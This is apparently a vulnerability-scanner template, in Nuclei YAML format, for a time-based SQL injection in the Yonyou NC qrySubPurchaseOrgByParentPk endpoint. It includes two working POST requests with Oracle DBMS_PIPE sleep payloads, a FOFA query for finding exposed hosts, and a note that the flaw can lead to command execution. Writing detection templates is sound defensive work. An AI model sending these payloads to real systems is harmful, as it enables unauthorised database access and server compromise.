http:
    - matchers:
        - condition: and
          dsl:
            - duration_1>=4 && duration_1<=5
            - duration_2>=8 && duration_2<=9
          type: dsl
      raw:
        - |
          POST /ebvp/register/qrySubPurchaseOrgByParentPk HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
          Content-Type: application/x-www-form-urlencoded

          pk_group=1' AND 1=DBMS_PIPE.RECEIVE_MESSAGE('RDS',4) --
        - |
          POST /ebvp/register/qrySubPurchaseOrgByParentPk HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
          Content-Type: application/x-www-form-urlencoded

          pk_group=1' AND 1=DBMS_PIPE.RECEIVE_MESSAGE('RDS',8) --
id: yongyouNC-qrySubPurchaseOrgByParentPk-sql-time
info:
    author: Superhero
    description: |-
        fofa: app="用友-UFIDA-NC"
        用友NC qrySubPurchaseOrgByParentPk接口存在SQL注入漏洞，攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令，从而控制服务器。经过分析与研判，该漏洞利用难度低，建议尽快修复。
    name: 用友NC qrySubPurchaseOrgByParentPk SQL注入漏洞
    reference:
        - https://mp.weixin.qq.com/s/TUH4qOgQEXoylRY6MWPaag
    severity: high
    tags:
        - 用友-ufida
